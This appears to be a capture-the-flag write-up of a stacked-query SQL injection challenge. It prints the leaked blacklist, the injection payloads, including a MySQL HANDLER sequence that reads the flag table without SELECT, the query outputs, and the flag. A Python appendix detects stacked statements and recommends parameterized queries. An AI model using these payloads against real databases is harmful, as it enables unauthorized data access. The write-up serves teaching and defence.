Start the challenge and the front page reads: Black list is so weak for you, isn't it
Type in a keyword or two at random to test it, e.g. select, and it dumps the entire blacklist in the error message (I had been planning to run a fuzzer against it):
return preg_match("/set|prepare|alter|rename|select|update|delete|drop|insert|where|\./i",$inject);
Union-based injection is out (select is filtered), so try stacked queries instead; CTFs really do love this type of question!
First list the databases: 1';show databases;
array(1) { [0]=> string(11) "ctftraining" }
array(1) { [0]=> string(18) "information_schema" }
array(1) { [0]=> string(5) "mysql" }
array(1) { [0]=> string(18) "performance_schema" }
array(1) { [0]=> string(9) "supersqli" }
array(1) { [0]=> string(4) "test" }
Next list the table names: 1';show tables;
array(1) { [0]=> string(8) "FlagHere" }
array(1) { [0]=> string(5) "words" }
Then look up the column information: 1';show columns from FlagHere;
array(6) { [0]=> string(4) "flag" [1]=> string(12) "varchar(100)" [2]=> string(2) "NO" [3]=> string(0) "" [4]=> NULL [5]=> string(0) "" }
Now for the key point. In MySQL:
- handler <table name> open opens a table
- then handler <table name> read <which row> reads rows from that table, without any select
- finally handler <table name> close closes it
So, from what we have learned so far, the payload can be built as:
1';handler FlagHere open;handler FlagHere read first;handler FlagHere close;
array(1) { [0]=> string(42) "flag{bc0dd949-5b62-41c7-85c5-95662641a510}" }
The flag obtained is flag{bc0dd949-5b62-41c7-85c5-95662641a510}
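As an added example (not part of the original write-up), here is the page's blacklist rebuilt in Python next to a quote-aware statement splitter of the kind a WAF rule or a query-log review would use, run over the three payloads above and some benign values. The application's own query is not shown in the post, so the template `SELECT * FROM words WHERE id = '...'` is an assumption; the payloads only tell us the value lands inside a single-quoted literal.

```python
import re

# Blacklist exactly as the write-up shows it (PHP preg_match with the /i flag).
PAGE_BLACKLIST = re.compile(
    r"set|prepare|alter|rename|select|update|delete|drop|insert|where|\.", re.I)

# Assumed query template: the post never shows the application's SQL, only that
# the value sits inside a quoted literal (every payload opens with 1').
def app_query(value):
    return "SELECT * FROM words WHERE id = '%s'" % value

def split_statements(sql):
    """Split on ';' outside single/double-quoted literals, honouring backslash escapes."""
    stmts, buf, quote, i = [], [], None, 0
    while i < len(sql):
        ch = sql[i]
        if quote:
            buf.append(ch)
            if ch == "\\" and i + 1 < len(sql):   # keep the escaped character as-is
                buf.append(sql[i + 1])
                i += 1
            elif ch == quote:
                quote = None
        elif ch in ("'", '"'):
            quote = ch
            buf.append(ch)
        elif ch == ";":
            stmts.append("".join(buf).strip())
            buf = []
        else:
            buf.append(ch)
        i += 1
    stmts.append("".join(buf).strip())
    return [s for s in stmts if s]

def leading_keyword(stmt):
    m = re.match(r"\s*([A-Za-z]+)", stmt)
    return m.group(1).lower() if m else None

def analyse(value):
    """What the page's filter says about a value vs. what actually reaches the server."""
    stmts = split_statements(app_query(value))
    extra = stmts[1:]                      # anything beyond the one intended statement
    return {
        "page_blacklist_hit": bool(PAGE_BLACKLIST.search(value)),
        "stacked": bool(extra),
        "stacked_keywords": [k for k in map(leading_keyword, extra) if k],
    }

if __name__ == "__main__":
    # Constructed inputs: the write-up's payloads plus benign values (note 1.5 trips the filter).
    for v in ["1", "O'Reilly", "1.5", "1';show databases;",
              "1';handler FlagHere open;handler FlagHere read first;handler FlagHere close;"]:
        print(repr(v), analyse(v))
```

The splitter makes the defect visible: the filter inspects keywords, but the payload's effect comes from closing the literal and appending further statements, and neither show nor handler is on the list. A parameterized query with multi-statement execution disabled removes both problems at once.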
THE END